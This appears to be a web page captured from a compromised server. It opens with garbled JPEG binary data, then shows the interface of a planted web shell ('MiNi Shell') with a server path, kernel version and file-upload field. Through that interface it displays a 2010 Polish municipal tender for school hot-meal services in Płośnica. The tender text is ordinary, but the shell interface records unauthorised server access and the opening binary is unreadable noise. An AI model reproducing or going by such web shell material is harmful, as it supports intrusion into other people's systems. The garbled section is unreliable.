JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20101203/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20101203/394684-N-2010.html

<p class="kh_header"><b>Płośnica: USŁUGA DOŻYWIANIA DZIECI W FORMIE GORĄCEGO POSIŁKU DLA UCZNIÓW SZKÓŁ 
PODSTAWOWYCH, GIMNAZJUM I ZESPOŁU SZKÓŁ NA TERENIE GMINY PŁOŚNICA</b><br>
<b>Numer ogłoszenia: 394684 - 2010; data zamieszczenia: 03.12.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gminny Ośrodek Pomocy Społecznej , ul. Lipowa 5, 13-206 Płośnica, woj. warmińsko-mazurskie, tel. 0-23 696 80 36, faks 0-23 696 86 12.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.plosnica.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> USŁUGA DOŻYWIANIA DZIECI W FORMIE GORĄCEGO POSIŁKU DLA UCZNIÓW SZKÓŁ 
PODSTAWOWYCH, GIMNAZJUM I ZESPOŁU SZKÓŁ NA TERENIE GMINY PŁOŚNICA.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Część I: 
1.	Przygotowanie i dowiezienie gorących posiłków w termosach wraz z zapewnieniem naczyń styropianowych i sztućców (włącznie z odbiorem termosów, niespożytych posiłków i zużytych naczyń i sztućców) oraz wydawanie posiłków, do następujących szkół:
a)	Szkoła Podstawowa w Płośnicy - posiłki dla 90 uczniów dostarczane do godz.10:00
b)	Szkoła Podstawowa w Niechłoninie - posiłki dla 18 uczniów dostarczane do godz.11:00
c)	Szkoła Podstawowa w Gródkach - posiłki dla 19 uczniów dostarczane do godz.10:15
d)	Szkoła Podstawowa w Wielkim Łęcku - posiłki dla 40 uczniów dostarczane do godz.10:30
2.	Przygotowanie i dowiezienie gorących posiłków w metalowych opakowaniach utrzymujących ciepłotę posiłku w tzw. geenach z zapewnieniem  naczyń jednorazowych styropianowych wraz ze sztućcami (łącznie z odbiorem niespożytych posiłków i zużytych naczyń i sztućców), do następujących szkół:
a)	Filialna Szkoła Podstawowa w Jabłonowie - posiłki dla 3 uczniów dostarczane do godz.10:15
3.	W przypadku gdy posiłki dostarczone w geenach nie będą utrzymywały temperatury, po zgłoszeniu tego faktu przez Zamawiającego, Wykonawca zapewni:
a)	indywidualne termosy dla każdego posiłku, gdy liczba uczniów dla których dostarczane będą posiłki nie przekroczy 6;
b)	termosy w przypadku gdy liczba dożywianych uczniów przekroczy 6.
4.	Wykonawca zobowiązany jest przygotować i dostarczyć posiłki, przez które rozumieć należy gorące posiłki o wartości odżywczej i kalorycznej co najmniej 450 kalorii. Zupy należy przygotowywać na wywarach jarskich (warzywnych) lub mięsnych. Podprawianie zup niskotłuszczową śmietaną lub mlekiem, albo masłem czy mąką, sporadycznie zasmażką. Stosowanie tłuszczów roślinnych, a ograniczanie tłuszczów zwierzęcych,  duży udział warzyw w posiłkach.
5.	Obiady winny mieć formę jednodaniowego gorącego posiłku serwowanego na przemian w następujący sposób:
a)	trzy dni w  tygodniu zupa z pieczywem (zupa 400 ml + 2 kromki chleba 100g);
b)	dwa dni w tygodniu drugie danie:
a.	ziemniaki gotowane, albo zamiennik typu: makaron, ryż, kasza 200g + mięso 100g + surówka - 100 g; 
b.	dania typu np. pierogi, naleśniki, kopytka, makaron z sosem, danie bezmięsne  lub krokiety 200g, 
6.	Wykonawca zapewni osobę do wydawania posiłków, która posiada aktualną książeczkę zdrowia do celów sanitarno-epidemiologicznych. Osoba wydająca posiłki zobowiązana jest do zachowania czystości osobistej i używania odzieży  ochronnej.
7.	Wykonawca będzie dostarczać posiłki samochodem dopuszczonym do przewozu żywności decyzją państwowego inspektora sanitarnego. 
8.	Wykonawca przedłoży dyrektorowi każdej ze szkół objętej realizacją zamówienia jadłospis na co najmniej 5 dni.
9.	Zamawiający zastrzega sobie możliwość zmiany ilości i rodzaju dostarczanych posiłków w zależności od zaistniałych potrzeb pod warunkiem że zmiany nie spowodują zwiększenia  ceny zamówienia określonej w umowie na jego realizację.



Część II:  
1.	Przygotowanie i wydawanie gorących posiłków z zapewnieniem miejsca do ich spożywania bez konieczności dowozu uczniów:
a)	dla 60 uczniów Publicznego Gimnazjum w Gródkach -  w godz. 10:00 -  14:00;
b)	dla  25 uczniów Zespołu Szkół w Gródkach - w godz. 10:00 - 14:00;
2.	Wykonawca zobowiązany jest do przygotowania i wydawania posiłków, przez które rozumieć należy gorące posiłki o wartości odżywczej i kalorycznej co najmniej 450 kalorii. Zupy należy przygotowywać na wywarach jarskich (warzywnych) lub mięsnych. Podprawianie zup niskotłuszczową śmietaną lub mlekiem, albo masłem czy mąką, sporadycznie zasmażką. Stosowanie tłuszczów roślinnych, a ograniczanie tłuszczów zwierzęcych,  duży udział warzyw w posiłkach.
3.	Obiady winny mieć formę jednodaniowego gorącego posiłku serwowanego na przemian w następujący sposób:
a)	trzy dni w  tygodniu zupa z pieczywem (zupa 400 ml + 2 kromki chleba 100g);
b)	dwa dni w tygodniu drugie danie:
a.	ziemniaki gotowane, albo zamiennik typu: makaron, ryż, kasza 200g + mięso 100g; + surówka 100g
b.	dania typu np. pierogi, naleśniki, kopytka, makaron z sosem, danie bezmięsne lub krokiety 200g;
4.	Wykonawca przedstawiał będzie jadłospis na  co najmniej 5 dni w tym:
a)	1 egzemplarz wywiesi w miejscu realizowania  usługi;
b)	1 egzemplarz dostarczy dyrektorowi każdej ze szkół objętej realizacją zamówienia.
5.  Zamawiający zastrzega sobie możliwość zmiany ilości i rodzaju dostarczanych posiłków w zależności od zaistniałych potrzeb, pod warunkiem że zmiany nie spowodują zwiększenia  ceny zamówienia określonej w umowie na jego realizację.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>1. Zamawiający przewiduje udzielenie zamówienia uzupełniającego w przypadku gdy liczba uczniów uprawnionych do korzystania z dożywiania przekroczy liczbę 170, a zwiększenie tej liczby spowoduje przekroczenie górnego pułapu wynagrodzenia określonego w § 5 pkt 3 umowy.
2. Zamówienie uzupełniające polegać będzie na powtórzeniu tego samego rodzaju zamówienia.
3. Zamówienie uzupełniające, o którym mowa w pkt.1 nie może przekroczyć łącznie 50% wartości zamówienia na część I określonej w § 5 pkt 3. 
4. W celu udzielenia Wykonawcy zamówienia uzupełniającego strony w trybie z wolnej ręki przeprowadzą negocjacje mające na celu ustalenie wszelkich warunków wykonania tego zamówienia i podpiszą umowę.
5. W przypadku gdy strony nie uzgodnią warunków umowy, o której mowa w pkt.4 Zamawiający będzie miał prawo udzielić zamówienia uzupełniającego osobie trzeciej.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 55.52.31.00-3, 55.52.40.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 03.01.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu wykazania spełniania warunku posiadania uprawnień do prowadzenia działalności Wykonawca składa: 1. Aktualne zezwolenie państwowego inspektora sanitarnego na prowadzenie działalności będącej przedmiotem zamówienia. 2. Oświadczenie o spełnianiu warunków udziału w postępowaniu określonych w art.22 ust.1 PZP. 3. W przypadku oferty składanej przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia dokument określony w pkt.1 może zostać złożony przez jednego z Wykonawców albo wspólnie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu wykazania spełniania warunku posiadania wiedzy i doświadczenia Wykonawca składa Oświadczenie o spełnianiu warunków udziału w postępowaniu określonych w art.22 ust.1 PZP</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu wykazania spełniania warunku posiadania potencjału technicznego Wykonawca składa 1. Oświadczenie o spełnianiu warunków udziału w postępowaniu określonych w art.22 ust.1 PZP 2. Wykaz pojazdów, którymi realizowana będzie usługa wraz z informacją o podstawie dysponowania tymi pojazdami w przypadku składania oferty na część I zamówienia- zgodnie z Załącznikiem 2 SIWZ, 3. Decyzja państwowego inspektora sanitarnego zatwierdzająca lokal do prowadzenia żywienia zbiorowego na część II zamówienia. 4. Decyzja państwowego inspektora sanitarnego dopuszczająca do przewozu żywności pojazdy, którym przewożone będą posiłki w ramach Części I zamówienia 5. W przypadku, gdy Wykonawca składać będzie ofertę na całość zamówienia, zobowiązany jest do przedłożenia obydwu dokumentów z pkt.2, 3, 4.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu wykazania spełniania warunku posiadania zdolności do wykonania zamówienia Wykonawca składa Oświadczenie o spełnianiu warunków udziału w postępowaniu określonych w art.22 ust.1 PZP</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu wykazania spełniania tego warunku Wykonawca składa Oświadczenie o spełnianiu warunków udziału w postępowaniu określonych w art.22 ust.1 PZP</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Oryginał pełnomocnictwa udzielonego osobom podpisującym ofertę, o ile prawo do reprezentowania Wykonawcy w powyższym zakresie nie wynika wprost z dokumentu rejestrowego; 2. Oryginał pełnomocnictwa do reprezentowania w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiana umowy może nastąpić w przypadku ustawowej zmiany stawki podatku od towarów i usług (VAT).</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.plosnica.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gminny Ośrodek Pomocy Społecznej w Płośnicy ul. Lipowa 5 13-206 Płośnica..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 13.12.2010 godzina 10:00, miejsce: Gminny Ośrodek Pomocy Społecznej w Płośnicy ul. Lipowa 5 13-206 Płośnica Sekretariat, pokój nr 2, I piętro..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Przygotowanie i dowóz gorących posiłków w termosach wraz z zapewnieniem naczyń jednorazowych i ich odbiorem oraz wydawanie posiłków dla uczniów szkół podstawowych: w Płośnicy, Niechłoninie, Gródkach, Wielkim Łęcku, Jabłonowie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Przygotowanie i dowiezienie gorących posiłków w termosach wraz z zapewnieniem naczyń styropianowych i sztućców (włącznie z odbiorem termosów, niespożytych posiłków i zużytych naczyń i sztućców) oraz wydawanie posiłków, do następujących szkół:
a)	Szkoła Podstawowa w Płośnicy - posiłki dla 90 uczniów dostarczane do godz.10:00
b)	Szkoła Podstawowa w Niechłoninie - posiłki dla 18 uczniów dostarczane do godz.11:00
c)	Szkoła Podstawowa w Gródkach - posiłki dla 19 uczniów dostarczane do godz.10:15
d)	Szkoła Podstawowa w Wielkim Łęcku - posiłki dla 40 uczniów dostarczane do godz.10:30
2.	Przygotowanie i dowiezienie gorących posiłków w metalowych opakowaniach utrzymujących ciepłotę posiłku w tzw. geenach z zapewnieniem  naczyń jednorazowych styropianowych wraz ze sztućcami (łącznie z odbiorem niespożytych posiłków i zużytych naczyń i sztućców), do następujących szkół:
a)	Filialna Szkoła Podstawowa w Jabłonowie - posiłki dla 3 uczniów dostarczane do godz.10:15
3.	W przypadku gdy posiłki dostarczone w geenach nie będą utrzymywały temperatury, po zgłoszeniu tego faktu przez Zamawiającego, Wykonawca zapewni:
a)	indywidualne termosy dla każdego posiłku, gdy liczba uczniów dla których dostarczane będą posiłki nie przekroczy 6;
b)	termosy w przypadku gdy liczba dożywianych uczniów przekroczy 6.
4.	Wykonawca zobowiązany jest przygotować i dostarczyć posiłki, przez które rozumieć należy gorące posiłki o wartości odżywczej i kalorycznej co najmniej 450 kalorii. Zupy należy przygotowywać na wywarach jarskich (warzywnych) lub mięsnych. Podprawianie zup niskotłuszczową śmietaną lub mlekiem, albo masłem czy mąką, sporadycznie zasmażką. Stosowanie tłuszczów roślinnych, a ograniczanie tłuszczów zwierzęcych,  duży udział warzyw w posiłkach.
5.	Obiady winny mieć formę jednodaniowego gorącego posiłku serwowanego na przemian w następujący sposób:
a)	trzy dni w  tygodniu zupa z pieczywem (zupa 400 ml + 2 kromki chleba 100g);
b)	dwa dni w tygodniu drugie danie:
a.	ziemniaki gotowane, albo zamiennik typu: makaron, ryż, kasza 200g + mięso 100g + surówka - 100 g; 
b.	dania typu np. pierogi, naleśniki, kopytka, makaron z sosem, danie bezmięsne  lub krokiety 200g, 
6.	Wykonawca zapewni osobę do wydawania posiłków, która posiada aktualną książeczkę zdrowia do celów sanitarno-epidemiologicznych. Osoba wydająca posiłki zobowiązana jest do zachowania czystości osobistej i używania odzieży  ochronnej.
7.	Wykonawca będzie dostarczać posiłki samochodem dopuszczonym do przewozu żywności decyzją państwowego inspektora sanitarnego. 
8.	Wykonawca przedłoży dyrektorowi każdej ze szkół objętej realizacją zamówienia jadłospis na co najmniej 5 dni.
9.	Zamawiający zastrzega sobie możliwość zmiany ilości i rodzaju dostarczanych posiłków w zależności od zaistniałych potrzeb pod warunkiem że zmiany nie spowodują zwiększenia  ceny zamówienia określonej w umowie na jego realizację..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.52.31.00-3, 55.52.40.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 03.01.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Przygotowanie i wydawanie gorących posiłków z zapewnieniem stołówki dla uczniów Publicznego Gimnazjum i Zespołu Szkół w Gródkach..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Przygotowanie i wydawanie gorących posiłków z zapewnieniem miejsca do ich spożywania bez konieczności dowozu uczniów:
a)	dla 60 uczniów Publicznego Gimnazjum w Gródkach -  w godz. 10:00 -  14:00;
b)	dla  25 uczniów Zespołu Szkół w Gródkach - w godz. 10:00 - 14:00;
2.	Wykonawca zobowiązany jest do przygotowania i wydawania posiłków, przez które rozumieć należy gorące posiłki o wartości odżywczej i kalorycznej co najmniej 450 kalorii. Zupy należy przygotowywać na wywarach jarskich (warzywnych) lub mięsnych. Podprawianie zup niskotłuszczową śmietaną lub mlekiem, albo masłem czy mąką, sporadycznie zasmażką. Stosowanie tłuszczów roślinnych, a ograniczanie tłuszczów zwierzęcych,  duży udział warzyw w posiłkach.
3.	Obiady winny mieć formę jednodaniowego gorącego posiłku serwowanego na przemian w następujący sposób:
a)	trzy dni w  tygodniu zupa z pieczywem (zupa 400 ml + 2 kromki chleba 100g);
b)	dwa dni w tygodniu drugie danie:
a.	ziemniaki gotowane, albo zamiennik typu: makaron, ryż, kasza 200g + mięso 100g; + surówka 100g
b.	dania typu np. pierogi, naleśniki, kopytka, makaron z sosem, danie bezmięsne lub krokiety 200g;
4.	Wykonawca przedstawiał będzie jadłospis na  co najmniej 5 dni w tym:
a)	1 egzemplarz wywiesi w miejscu realizowania  usługi;
b)	1 egzemplarz dostarczy dyrektorowi każdej ze szkół objętej realizacją zamówienia.
5.  Zamawiający zastrzega sobie możliwość zmiany ilości i rodzaju dostarczanych posiłków w zależności od zaistniałych potrzeb, pod warunkiem że zmiany nie spowodują zwiększenia  ceny zamówienia określonej w umowie na jego realizację.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.52.31.00-3, 55.52.40.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 03.01.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com